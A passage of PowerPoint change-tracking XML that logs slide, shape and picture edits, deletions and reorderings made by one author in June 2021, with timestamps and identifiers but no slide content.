        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:54.680" v="2383" actId="114"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2625291343" sldId="446"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:54.680" v="2383" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:spMk id="2" creationId="{8BF062BD-790B-4A8A-A964-AFADDB9ABAE7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:12.519" v="2342" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:spMk id="7" creationId="{53976C66-44D4-428F-B5B4-989D503B6992}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:33.196" v="2368" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:spMk id="8" creationId="{9C3F71E9-3EB9-421E-9264-F5CB6D03832C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:31:45.996" v="2301" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:picMk id="4" creationId="{6755E551-E525-4778-A07B-F29E5BC5CB06}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:31:36.777" v="2298" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:picMk id="6" creationId="{86091216-7469-46ED-95F0-405F871469F2}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:33:41.915" v="2642" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T14:47:52.801" v="4" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1325061211" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T14:47:52.801" v="4" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:52:28.910" v="846"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2789471632" sldId="392"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:48:46.530" v="1299" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3672303902" sldId="393"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T23:00:52.837" v="1447" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2467691949" sldId="394"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:58:00.750" v="1430" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="3" creationId="{76E1B39B-59AC-4EE1-87FD-39C3199A948A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:58:48.988" v="1441" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="8" creationId="{A2208B58-0E66-44D6-BA81-6687A0D72552}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="14" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="17" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="22" creationId="{16115475-8B62-47B5-80A6-1F1F393306CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="29" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="35" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="36" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T23:00:52.837" v="1447" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:picMk id="6" creationId="{E56ACD9C-686E-43F4-A55E-E9A1ED1633C5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:picMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:picMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:picMk id="13" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:picMk id="27" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:picMk id="28" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:picMk id="37" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:cxnSpMk id="5" creationId="{1F1BDC6F-E7B5-486D-95CC-DE84EDF5B973}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:cxnSpMk id="15" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:cxnSpMk id="16" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:cxnSpMk id="23" creationId="{13BA38A7-EB2B-409D-9F20-58122B90E850}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:57:57.911" v="1429" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:cxnSpMk id="32" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:14:59.793" v="1894" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1030962794" sldId="395"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:50:05.180" v="1985" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1635951812" sldId="396"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:58:11.629" v="1431" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3476957671" sldId="397"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:49:35.593" v="1978" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="837580508" sldId="398"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:49:39.424" v="1979" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="775249280" sldId="399"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:49:43.824" v="1980" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="614667185" sldId="400"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:56:44.305" v="2061" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3582893092" sldId="401"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:44.390" v="2138" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="819433619" sldId="402"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:56:41.092" v="2060" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="39788097" sldId="403"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:36.173" v="2137"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3665038014" sldId="404"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:02:18.937" v="2126" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="464350271" sldId="405"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:01:07.195" v="2110" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="464350271" sldId="405"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:45.380" v="2139" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2093752077" sldId="406"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:57.502" v="2143" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1972666229" sldId="407"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:59.125" v="2144" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2980641166" sldId="408"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:12:01.142" v="2145" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3277870470" sldId="409"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:13:03.364" v="2149" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3881480386" sldId="413"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:55:00.563" v="2411" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3118374455" sldId="414"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:55:00.563" v="2411" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3118374455" sldId="414"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:12:04.673" v="2146" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="214186708" sldId="415"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:02:44.507" v="2128" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4266318337" sldId="416"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:02:44.507" v="2128" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4266318337" sldId="416"/>
            <ac:picMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:56:53.240" v="2063" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1453023660" sldId="417"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:13:52.471" v="2156" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4247754591" sldId="418"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:13:52.471" v="2156" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4247754591" sldId="418"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:11:49.338" v="2140" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1871513867" sldId="419"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:52:48.206" v="847" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4160866766" sldId="420"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:52:50.831" v="848" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1090587346" sldId="421"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:56:37.985" v="1425" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2079099636" sldId="422"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:56:46.417" v="1426" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1881823739" sldId="423"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
